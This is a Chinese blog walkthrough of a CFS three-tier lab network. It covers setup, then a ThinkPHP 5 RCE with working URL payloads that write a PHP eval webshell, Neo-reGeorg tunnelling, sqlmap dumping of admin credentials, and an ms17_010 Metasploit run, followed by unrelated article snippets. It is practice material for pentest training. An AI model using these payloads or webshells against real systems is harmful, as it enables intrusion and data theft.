CFS三层靶机内网渗透

CFS三层靶机内网渗透

  • 一、靶场搭建
    • 1.基础参数信息
    • 2.靶场搭建
      • 2.1网卡配置
      • 2.2Target1配置
        • 2.2.1 网卡配置
        • 2.2.2 Target1 BT配置
      • 2.3Target2配置
        • 2.3.1 网卡配置
        • 2.3.2 Target2 BT配置
      • 2.4Target3配置
  • 二、内网渗透
    • Target1
      • 1.1信息收集
        • 1.1.1IP收集
        • 1.1.2端口收集
        • 1.1.3目录收集
      • 1.2 webshell获取
        • 1.2.1手工POC注入
        • 1.2.2蚁剑验证
      • 1.3 Target1本机信息收集
        • 1.3.1找flag
        • 1.3.2 收集服务、端口、路由、ip、网段、内核等
        • 1.3.3内网存活探测
    • Target2
      • 2.1信息收集
        • 2.1.1 端口收集
        • 2.1.2 目录收集
      • 2.2webshell获取
        • 2.2.1 后台获取
        • 2.2.2 sql注入
        • 2.2.3 拿shell
      • 2.3 Target2本机信息收集
        • 2.3.1找flag
        • 2.3.2 收集服务、端口、路由、ip、网段、内核等
      • 2.4 搭建二层代理
    • Target3

一、靶场搭建

1.基础参数信息

网段:
Kali:       nat
Target1:    nat + 22
Target2:    22 + 33
Target3:    33三个靶机密码:
操作系统:root
登录密码:teamssix.comTarget1  BT(宝塔后台)
地址:http://x.x.x.x:8888/a768f109/    #此处为后台地址
账号:eaj3yhsl密码:41bb8feeTarget2  BT(宝塔后台)
地址:http://x.x.x.x:8888/2cc52ec0/    #此处为后台地址
账号:xdynr37d 
密码:123qwe.. 

思维导图
在这里插入图片描述
在这里插入图片描述

2.靶场搭建

2.1网卡配置

新导入两张网卡VMnet2VMnet3,配置网段192.168.22.0/24192.168.33.0/24
在这里插入图片描述

2.2Target1配置

2.2.1 网卡配置

VMnet8VMnet2 即NAT+22段
在这里插入图片描述

2.2.2 Target1 BT配置

Target1 BT
后台地址:http://192.168.231.128:8888/a768f109/
账号:eaj3yhsl
密码:41bb8fee
在这里插入图片描述
配置添加域名192.168.231.128192.168.22.128,使其可以访问
在这里插入图片描述

2.3Target2配置

2.3.1 网卡配置

VMnet2VMnet3 即22+33段
在这里插入图片描述

2.3.2 Target2 BT配置

暂时先加入NAT网卡,以配置宝塔后台,配置完成后,移除NAT网卡
在这里插入图片描述
从kali中可以看出新加入的网卡地址为192.168.231.129
在这里插入图片描述
Target2 BT
后台地址:http://192.168.231.129:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..
在这里插入图片描述
配置添加域名192.168.22.129192.168.22.128,使其可以访问
在这里插入图片描述

最后删除刚刚添加的NAT网卡

2.4Target3配置

网卡配置:VMnet3 即33段,其他的就没什么了
在这里插入图片描述

接下来就可以开始内网渗透了,现在忘掉配置是的网卡信息,IP信息,后台信息等等,开始全真模拟

二、内网渗透

Target1

1.1信息收集

1.1.1IP收集
arp-scan -l

在这里插入图片描述

1.1.2端口收集
nmap -sV -sS -T4  192.168.231.128 -p 1-65535

在这里插入图片描述

1.1.3目录收集
dirb http://192.168.231.128/
或者
dirsearch -u http://192.168.231.128

在这里插入图片描述
在这里插入图片描述

1.2 webshell获取

根据收集到的端口、IP及目录信息等进行访问

通过访问80端口,以及Wappalyzer插件,透露出他的一些信息
在这里插入图片描述
接下来尝试用goby扫描,得知存在着两个可能的漏洞,这也可以通过网上搜索ThinkPHP V5历史版本漏洞得知
在这里插入图片描述
根据上述漏洞,可进行验证,验证方法多种1.手工POC验证,2.ThinkPHP V5一键工具等

在goby中漏洞验证也是成功的,说明漏洞可以利用

ThinkPHP 5.0.23 Remote Code Execution Vulnerability
在这里插入图片描述

ThinkPHP 5.x RCE
在这里插入图片描述

1.2.1手工POC注入

POC:输入系统命令: whoami

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述

POC:通过替换参数值,还可以将php代码写入文件, 此处我们写一个phpinfo

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=phpinfo.php&vars[1][]=<?php phpinfo(); ?>

在这里插入图片描述
然后在网页查看,发现可行,那么可以尝试构建webshell
在这里插入图片描述

POC:写入webshell,如果有过滤还可以采取编码方式
在这写了一个简单的一句话木马

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['lll']);?>

在这里插入图片描述

1.2.2蚁剑验证

验证成功,在这里webshell就拿到了
在这里插入图片描述

1.3 Target1本机信息收集

1.3.1找flag
find / -name "flag.txt" 2>/dev/null

在这里插入图片描述

1.3.2 收集服务、端口、路由、ip、网段、内核等
查内核
uname -r
查ip
ifconfig
ip a
查端口
netstat -ntlp
查进程
ps -ef
查路由
route翻翻目录、文件

在这里插入图片描述
在这里插入图片描述

1.3.3内网存活探测

方法一、允许上传的情况下上传工具(/tmp等有权限的目录中)在T1上做信息收集fscan等工具直接上传即可

方法二、直接通过正向代理工具neo-regroge建立socks通道,导入流量(无法使用icmp探测存活)上传tunnel文件,建立连接

neo-regeorg
搭建正向代理,不需要在对方服务器中额外开通端口,利用后端代码
下载地址:https://github.com/L-codes/Neo-reGeorg
Step 1. 设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器

$ python neoreg.py generate -k password[+] Create neoreg server files:=> neoreg_servers/tunnel.jsp=> neoreg_servers/tunnel.jspx=> neoreg_servers/tunnel.ashx=> neoreg_servers/tunnel.aspx=> neoreg_servers/tunnel.php=> neoreg_servers/tunnel.go

上传对应后缀到web服务器
在这里插入图片描述

Step 2. 使用 neoreg.py 连接 WEB 服务器,在本地建立 socks5 代理

$ python3 neoreg.py -k password -u http://xx/tunnel.php
+------------------------------------------------------------------------+Log Level set to [DEBUG]Starting socks server [127.0.0.1:1080]Tunnel at:http://xx/tunnel.php
+------------------------------------------------------------------------+

在这里插入图片描述

vi /etc/proxychains4.conf

在这里插入图片描述

至此1层代理搭建成功

通过proxychains工具可连接当前的socks代理工具,proxychains4配置代理后可将kali的流量通过T1服务器作为跳板进行扫描

代理插件使用
在这里插入图片描述

Target2

通过上述信息收集手段,获得开启的端口等,搭建代理访问
在这里插入图片描述

查找当前cms的历史漏洞,若无历史漏洞,下下策为找源代码审计,大部分系统不开源故不存在代码审计过程;

2.1信息收集

2.1.1 端口收集
 proxychains nmap -Pn -sT 192.168.22.129 

在这里插入图片描述

2.1.2 目录收集
dirsearch -u http://192.168.22.129/ --proxy socks5://192.168.231.135:1000

在这里插入图片描述

2.2webshell获取

2.2.1 后台获取

通过扫出来的目录找到/robots.txt,而/robots.txt给出了两个路径
Disallow: /admini/
Disallow: /index.php?r=admini*

在这里插入图片描述
sql注入点

<!-- Hint:SQL注入点:/index.php?r=vul&keyword=1>

在这里插入图片描述

后台获取
根据上述sql注入点以及robots.txt找后台地址
在这里插入图片描述

2.2.2 sql注入
--proxy代理参数
--dbs 所有库
--tables 某个库中的所有表
--columns 上一个表中的所有字段

1.数据库查询

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch --dbs --proxy=socks5://192.168.231.135:1000

在这里插入图片描述
2.查询表

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch -D bagecms --tables  --proxy=socks5://192.168.231.135:1000

在这里插入图片描述

3.查询字段

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin --columns  --proxy=socks5://192.168.231.135:1000

在这里插入图片描述

4.查询内容

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin -C username,password  --dump --proxy=socks5://192.168.231.135:1000

在这里插入图片描述
后台账号密码

+----------+-------------------------------------------+
| username | password                                  |
+----------+-------------------------------------------+
| admin    | 46f94c8de14fb36680850768ff1b7f2a (123qwe) |
+----------+-------------------------------------------+

一登陆就看见一个flag
在这里插入图片描述

2.2.3 拿shell

登录后:重点关注上传(头像、文件、编辑器)、导出(文件、sql语句)、自定义模版(网站结构、默认页面更改),ssrf

登入后台后,根据历史漏洞提示后台模板存在一个rce问题
在这里插入图片描述

在页面中插入拿shell的语句
在这里插入图片描述
代理设置
在这里插入图片描述
蚁剑连接
在这里插入图片描述

2.3 Target2本机信息收集

重复T1信息收集的步骤对T2进行操作即可

2.3.1找flag
find / -name "flag.txt" 2>/dev/null

在这里插入图片描述

2.3.2 收集服务、端口、路由、ip、网段、内核等
查内核
uname -r
查ip
ifconfig
ip a
查端口
netstat -ntlp
查进程
ps -ef
查路由
route翻翻目录、文件

在这里插入图片描述

2.4 搭建二层代理

同理上传tunnel文件至T2通过T1建立socks端口,此时会在T1上生成代理通道

T1具备python环境
在这里插入图片描述
在T1中上传Neo-reGeorg-master并解压

unzip Neo-reGeorg-master.zip

在这里插入图片描述

在T2中上传tunnel文件
在这里插入图片描述

代理开启:

python neoreg.py -k password -u http://192.168.22.129/tunnel.php -l 0.0.0.0 -p 2000

在这里插入图片描述

Target3

以T2为跳板访问T3
以T2为跳板

明确内网33.33服务器上存在两个可能有漏洞的端口3389(cve-2019-0708)、445(ms17-010)

proxychains nmap -Pn -sT -sV 192.168.33.33 -p 445,3389

在这里插入图片描述

proxychains msfconsole    
search ms17_010

在这里插入图片描述

use 1
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33

在这里插入图片描述

最后run

在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/211022.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

CentOS最小化安装后怎么转图形界面/可视化桌面?

文章目录 1、命令行和图形界面切换方式一方式二 2、最小化安装转桌面1-设置网络2-测试网络3-更新文件4-安装图形5-查看默认6-设置默认 界面效果参考视频 1、命令行和图形界面切换 如果安装的是最小化&#xff0c;那么init 5 (进入图像化桌面)命令是无效的 方式一 1.如果在命…

【计算机网络】15、NAT、NAPT 网络地址转换、打洞

文章目录 一、概念二、分类&#xff08;主要是传统 NAT&#xff09;2.1 基本 NAT2.2 NAPT 三、访问NAT下的内网设备的方式3.1 多拨3.2 端口转发、DMZ3.3 UPnP IGD、NAT-PMP3.4 服务器中转&#xff1a;frp 内网穿透3.4.1 NAT 打洞3.4.2 NAT 类型与打洞成功率3.4.2.1 完全圆锥形 …

基于hadoop下的hbase安装

简介 HBase是一个分布式的、面向列的开源数据库&#xff0c;该技术来源于Fay Chang所撰写的Google论文“Bigtable&#xff1a;一个结构化数据的分布式存储系统”。就像Bigtable利用了Google文件系统&#xff08;File System&#xff09;所提供的分布式数据存储一样&#xff0c;…

nodejs+vue+ElementUi酒店餐饮客房点餐管理系统

系统非功能需求&#xff0c;只能是为了满足客户需求之外的非功能性要求。系统需要具有数据完整性验证的功能&#xff0c;对界面上非法的数据和不完整的数据进行提示&#xff0c;不能直接保存到数据库中&#xff0c;造成不完整性因素。运行软件:vscode 前端nodejsvueElementUi 语…

VSCode 开发C/C++实用插件分享——codegeex

VSCode 开发C/C实用插件分享——codegeex 一、codegeex 一、codegeex CodeGeeX 智能编程助手是一款编程插件&#xff0c;CodeGeeX支持多种主流IDE&#xff0c;如VS Code、IntelliJ IDEA、PyCharm、Vim等&#xff0c;同时&#xff0c;支持Python、Java、C/C、JavaScript、Go等多…

LeetCode 2477. 到达首都的最少油耗:深度优先搜索(DFS)

【LetMeFly】2477.到达首都的最少油耗&#xff1a;深度优先搜索(DFS) 力扣题目链接&#xff1a;https://leetcode.cn/problems/minimum-fuel-cost-to-report-to-the-capital/ 给你一棵 n 个节点的树&#xff08;一个无向、连通、无环图&#xff09;&#xff0c;每个节点表示一…

Doris 集成 ElasticSearch

Doris-On-ES将Doris的分布式查询规划能力和ES(Elasticsearch)的全文检索能力相结合,提供更完善的OLAP分析场景解决方案: (1)ES中的多index分布式Join查询 (2)Doris和ES中的表联合查询,更复杂的全文检索过滤 1 原理 (1)创建ES外表后,FE会请求建表指定的主机,获取所有…

Azure Machine Learning - 使用 Azure OpenAI 服务生成文本

使用 Azure OpenAI 服务生成文本 关注TechLead&#xff0c;分享AI全维度知识。作者拥有10年互联网服务架构、AI产品研发经验、团队管理经验&#xff0c;同济本复旦硕&#xff0c;复旦机器人智能实验室成员&#xff0c;阿里云认证的资深架构师&#xff0c;项目管理专业人士&…

一文读懂中间件

前言&#xff1a;在程序猿的日常工作中&#xff0c; 经常会提到中间件&#xff0c;然而大家对中间件的理解并不一致&#xff0c;导致了一些不必要的分歧和误解。“中间件”一词被用来描述各种各样的软件产品&#xff0c;在不同文献中有着许多不同的中间件定义&#xff0c;包括操…

Linux--初识和基本的指令(3)

目录 1.前言 1.指令 1.1 cat指令 1.2 echo指令 1.3 more 指令 1.4 less指令 1.5 什么时候使用less和more 1.6 head指令 1.7 tail指令 1.8 wc指令 1.9 与时间相关的指令 1.9.1 date指令 1.9.2 cal指令 1.10 16.find指令&#xff1a;&#xff08;灰常重要&#x…

RPG项目01_脚本代码

基于“RPG项目01_场景及人物动画管理器”&#xff0c;我们创建一个XML文档 在资源文件夹下创建一个文件夹&#xff0c; 命名为Xml 将Xnl文档拖拽至文件夹中&#xff0c; 再在文件夹的Manager下新建脚本LoadManager 写代码&#xff1a; using System.Collections; using System…

7、Qt延时的使用

一、说明 平时用到两种延时方式QThread::sleep()和QTimer::singleShot() 1、QThread::sleep() QThread类中如下三个静态函数&#xff1a; QThread::sleep(n); //延迟n秒 QThread::msleep(n); //延迟n毫秒 QThread::usleep(n); //延迟n微妙 这种方式使用简单&#xff0c;但是会阻…

四.多表查询

多表查询 1.一个案例引发的多表连接1.1案例说明1.2 笛卡尔积&#xff08;或交叉连接&#xff09;的理解1.3案例分析与问题解决 2.多表查询分类讲解分类1&#xff1a;等值连接vs非等值连接分类2&#xff1a;自连接vs非自连接分类3&#xff1a;内连接vs外连接 3.SQL99语法实现多表…

【【FPGA 之 MicroBlaze XADC 实验】】

FPGA 之 MicroBlaze XADC 实验 Vivado IP 核提供了 XADC 软核&#xff0c;XADC 包含两个模数转换器&#xff08;ADC&#xff09;&#xff0c;一个模拟多路复用器&#xff0c;片上温度和片上电压传感器等。我们可以利用这个模块监测芯片温度和供电电压&#xff0c;也可以用来测…

在AWS Lambda上部署标准FFmpeg工具——自定义层的方案

大纲 1 确定Lambda运行时环境1.1 Lambda系统、镜像、内核版本1.2 运行时1.2.1 Python1.2.2 Java 2 打包FFmpeg3 创建Lambda的Layer4 测试4.1 创建Lambda函数4.2 附加FFmpeg层4.3 添加测试代码4.4 运行测试 参考文献 FFmpeg被广泛应用于音/视频流处理领域。对于简单的需求&#…

sizeof()、strlen()、length()、size()的区别(笔记)

​ 上面的笔记有点简陋&#xff0c;可以看一下下面这个博主的&#xff1a; c/c中sizeof()、strlen()、length()、size()详解和区别_csize,sizeof,length_xuechanba的博客-CSDN博客

Linux Docker 图形化工具 Portainer远程访问

文章目录 前言1. 部署Portainer2. 本地访问Portainer3. Linux 安装cpolar4. 配置Portainer公网访问地址5. 公网远程访问Portainer6. 固定Portainer公网地址 结束语 前言 Portainer是一个轻量级的容器管理工具&#xff0c;可以通过Web界面对Docker容器进行管理和监控。它提供了…

Kafka中的Topic

在Kafka中&#xff0c;Topic是消息的逻辑容器&#xff0c;用于组织和分类消息。本文将深入探讨Kafka Topic的各个方面&#xff0c;包括创建、配置、生产者和消费者&#xff0c;以及一些实际应用中的示例代码。 1. 介绍 在Kafka中&#xff0c;Topic是消息的逻辑通道&#xff0…

LeetCode-478. 在圆内随机生成点【几何 数学 拒绝采样 随机化】

LeetCode-478. 在圆内随机生成点【几何 数学 拒绝采样 随机化】 题目描述&#xff1a;解题思路一&#xff1a;一个最简单的方法就是在一个正方形内生成随机采样的点&#xff0c;然后拒绝不在内切圆中的采样点。解题思路二&#xff1a;具体思想是先生成一个0到r的随机数len&…

加强网站稳定性!学习如何进行高效压力测试!

前言 1、什么是压力测试&#xff1f; 软件压力测试是一种基本的质量保证行为&#xff0c;它是每个重要软件测试工作的一部分。 软件压力测试的基本思路很简单&#xff1a;不是在常规条件下运行手动或自动测试&#xff0c;而是在计算机数量较少或系统资源匮乏的条件下运行测试…